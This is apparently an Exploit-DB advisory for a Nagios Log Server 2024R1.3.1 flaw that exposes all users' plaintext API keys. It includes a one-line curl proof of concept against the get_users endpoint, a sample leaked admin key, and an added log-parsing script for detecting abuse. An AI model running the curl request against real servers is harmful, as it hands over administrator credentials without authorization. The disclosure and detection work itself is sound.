Exploit-DB b165516b1b DB: 2025-04-12
2025-04-12 00:16:31 +00:00


Exploit Title: Nagios Log Server 2024R1.3.1 - API Key Exposure

Date: 2025-04-08

Exploit Author: Seth Kraft, Alex Tisdale

Vendor Homepage: https://www.nagios.com/

Vendor Changelog: https://www.nagios.com/changelog/#log-server

Software Link: https://www.nagios.com/products/log-server/download/

Version: Nagios Log Server 2024R1.3.1 and below

Tested On: Nagios Log Server 2024R1.3.1 (default configuration, Ubuntu 20.04)

CWE: CWE-200, CWE-284, CWE-522

CVSS: 9.8 (CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

Type: Information Disclosure, Improper Access Control

Exploit Risk: Critical

Disclosure

For ethical research purposes only. Do not target systems without proper authorization.

Description

An API-level vulnerability in Nagios Log Server 2024R1.3.1 allows any user with a valid API token to retrieve a full list of user accounts along with their plaintext API keys, including administrator credentials. This flaw enables user enumeration, privilege escalation, and full system compromise via unauthorized use of exposed tokens.

PoC

Step 1: Access the vulnerable endpoint

curl -X GET "http://<target-ip>/nagioslogserver/index.php/api/system/get_users?token=<valid_token>"

Sample Response

[
  {
    "name": "devadmin",
    "username": "devadmin",
    "email": "test@example.com",
    "apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de",
    "auth_type": "admin",
    ...
  }
]
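Because the token travels in the query string, every call to the affected endpoint lands in the web server's access log. The following detection script is an added example, not part of the advisory: it assumes combined-log-format lines (constructed here) and reports successful get_users calls plus any token seen from more than one source address, which is the pattern a leaked key produces.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Apr/2025:10:01:02 +0000] "GET /nagioslogserver/index.php/api/system/get_users?token=aaaa1111 HTTP/1.1" 200 1432
10.0.0.5 - - [08/Apr/2025:10:01:09 +0000] "GET /nagioslogserver/index.php/api/system/status?token=aaaa1111 HTTP/1.1" 200 210
203.0.113.7 - - [08/Apr/2025:10:03:44 +0000] "GET /nagioslogserver/index.php/api/system/get_users?token=aaaa1111 HTTP/1.1" 200 1432
203.0.113.7 - - [08/Apr/2025:10:03:50 +0000] "GET /nagioslogserver/index.php/api/system/get_users?token=bbbb2222 HTTP/1.1" 200 1432
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Endpoint named in the advisory's PoC.
GET_USERS = "/nagioslogserver/index.php/api/system/get_users"


def parse_line(line):
    """Split one access-log line into ip, timestamp, path, token and status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("path").partition("?")
    params = dict(p.split("=", 1) for p in query.split("&") if "=" in p)
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": path,
            "token": params.get("token"), "status": int(m.group("status"))}


def analyse(log_text):
    """Flag successful get_users calls and API tokens used from several IPs."""
    get_users_hits = []
    token_ips = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["token"] is None:
            continue
        token_ips[rec["token"]].add(rec["ip"])
        if rec["path"] == GET_USERS and rec["status"] == 200:
            get_users_hits.append((rec["ip"], rec["ts"], rec["token"]))
    # A token appearing from more than one address suggests it has leaked.
    shared = {t: sorted(ips) for t, ips in token_ips.items() if len(ips) > 1}
    return {"get_users_hits": get_users_hits,
            "tokens_from_multiple_ips": shared}


if __name__ == "__main__":
    for k, v in analyse(SAMPLE_LOG).items():
        print(k, v)
```

On a real deployment, point the function at the Apache or nginx access log and treat every hit from a non-administrative source, or any shared token, as a reason to rotate the affected API keys.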